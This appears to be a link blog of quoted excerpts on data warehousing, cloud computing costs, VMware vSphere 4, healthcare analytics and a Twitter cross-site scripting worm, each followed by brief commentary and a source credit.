Is building an enterprise data warehouse (EDW) the best path to business intelligence (BI)? It’s a perennially vexing question that — thanks to a couple of recent trends in BI and data warehousing (DW) — has taken on new life.
The value of the full-fledged EDW seems unassailable. Over the last half-decade, however, some of the biggest EDW champions have moderated their stances, such that they now both countenance the existence of alternatives and, under certain very special conditions, are even willing to admit they’re useful. The result is that although the EDW is still seen as the Holy Grail of data warehousing, departmental (and even enterprise) data marts are now countenanced as well.
Active EDW giant Teradata Inc. is the foremost case in point, but other players — including relative newcomer Hewlett-Packard Co. (HP), which is in the high-end DW segment (by its acquisition of Knightsbridge Solutions) and markets Neoview, a DW appliance-like offering — are staking out similar ground. (In addition to Neoview, HP also partners with both Microsoft Corp. and Oracle Corp. to market appliances in the 1 to 32 TB range.)
Interesting debate on TDWI.
The cloud computing space is getting heated-up. VMWare’s latest major update to their existing ESX server will be an addition to the portfolio of cloud computing software.
VMware on April 21 launched vSphere 4, a major update to its ESX Server hypervisor, declaring it to be the first operating system specifically engineered for cloud computing. It is the first major upgrade to the product since 2006.
vSphere 4 amounts to a rebuild of VMware’s core virtualization platform. Fundamentally, it combines virtual resources in the data center into one centrally managed pool of computing power. It will be made available in the second quarter of 2009, the company said.
vSphere 4′s second purpose is to facilitate delivery of IT infrastructure as a service to enterprises, so IT departments can build their own private cloud systems to provide business services internally for the company and for trusted partners, supply chain participants and other business associates.
From eWeek’s article.
The Small Business Intelligence Summit (SBIS) will kick off the first of a nationwide series of events in Dallas, Texas on Thursday, May 14, with intensive sessions to help small businesses succeed in the current challenging economy. The events will allow existing and developing companies to connect and collaborate on solutions that support their business in today’s environment and well into the future.
The events will feature expert speakers, including sessions with:
– Chuck Wilsker, president and CEO of the Telework Coalition and co-
author of numerous articles, including “Unleashing the Hidden Productivity
of Your Small Business. Unified Communications: A Key Component of Your
– Bob Burg, corporate speaker and author of “Endless Referrals: Network
Your Everyday Contacts Into Sales”
– Christopher Justice, CEO of Sparksight, a small business-marketing
– Small and Mid-size Business experts from Avaya, a global leader in
From the Press Release. More from the official site – SBIS09.
From New York Times BITS Blog, a post on McKinsey’s recent study on Cloud Computing.
The McKinsey study, “Clearing the Air on Cloud Computing,” concludes that outsourcing a typical corporate data center to a cloud service would more than double the cost. Its study uses Amazon.com’s Web service offering as the price of outsourced cloud computing, since its service is the best-known and it publishes its costs. On that basis, according to McKinsey, the total cost of the data center functions would be $366 a month per unit of computing output, compared with $150 a month for the conventional data center.
“The industry has assumed the financial benefits of cloud computing and, in our view, that’s a faulty assumption,” said Will Forrest, a principal at McKinsey, who led the study.
Owning the hardware, McKinsey states, is actually cost-effective for most corporations when the depreciation write-offs for tax purposes are included. And the labor savings from moving to the cloud model has been greatly exaggerated, Mr. Forrest says. The care and feeding of a company’s software, regardless of where it’s hosted, and providing help to users both remain labor-intensive endeavors.
Clouds, Mr. Forrest notes, can make a lot of sense for small and medium-sized companies, typically with revenue of $500 million or less.
Over at The Health Care Blog, Deb Bradley, Vice President, Client Solutions at Verisk Health in Waltham, Massachusetts writes about some examples of the next generation healthcare analytics. Most of us who do analytics engineering as apart of our day jobs would agree, healthcare is on area where analytics should grow vastly. There is a lot of data that can be intelligently massaged to answer some of the most challeging health related questions.
Medical claims, pharmacy claims, lab values, HRAs, genetic markers, biometrics – the abundance of data is having an immediate impact on how analytics shape healthcare. Next generation analytics are bringing attention to health and wellness rather than disease-specific guidelines, and generating novel approaches to value-based medicine and care management.
Traditionally, analytics, such as predictive modeling, have been used to identify individuals for chronic care management and to set rates. New predictive models, however, include financial and clinical algorithms, which allow healthcare organizations to implement advanced ways to identify, manage and measure risk across and within a population.
Cross site scripting is getting to be a common security vulnerability for online services. And Twitter that allows 140 characters per tweet wasn’t an exception.
The worms exploit a common vulnerability in Web applications called cross-site scripting, which allows someone to inject code into Web pages others are viewing.
In this instance, Twitter users who clicked on the name or image of anyone sending the worm messages would get infected and then send the message on to all that person’s followers. Anyone viewing an infected user’s profile would also get infected and pass the worm on.
While the attacks were mostly a nuisance, they could have been dangerous if spyware or other malware had been downloaded onto Twitter users’ computers, Cluley said.
This CDWA has served us well the last twenty years. In fact, up to five years ago we had good reasons to use this architecture. The state of database, ETL, and reporting technology did not really allow us to develop something else. All the tools were aimed at supporting the CDWA. But the question right now is: twenty years later, is this still the right architecture? Is this the best possible architecture we can come up with, especially if we consider the new demands and requirements, and if we look at new technologies available in the market? My answer would be no! To me, we are slowly reaching the end of an era. An era where the CDWA was king. It is time for change. This article is the first in a series on the flaws of the CDWA and on an alternative architecture, one that fits the needs and wishes of most organizations for (hopefully) the next twenty years. Let’s start by describing some of the CDWA flaws.
The first flaw is related to the concept of operational business intelligence. More and more, organizations show interest in supporting operational business intelligence. What this means is that the reports that the decision makers use have to include more up-to-date data. Refreshing the source data once a day is not enough for those users. Decision makers who are quite close to the business processes especially need 100% up-to-date data. But how do you do this? You don’t have to be a technological wizard to understand that, if data has to be copied four or five times from one data storage layer to another, to get from the production databases to the reports, doing this in just a few seconds will become close to impossible. We have to simplify the architecture to be able to support operational business intelligence. Bottom line, what it means is that we have to remove data storage layers and minimize the number of copy steps.
Great read from BEye Network. Part 1 and Part 2.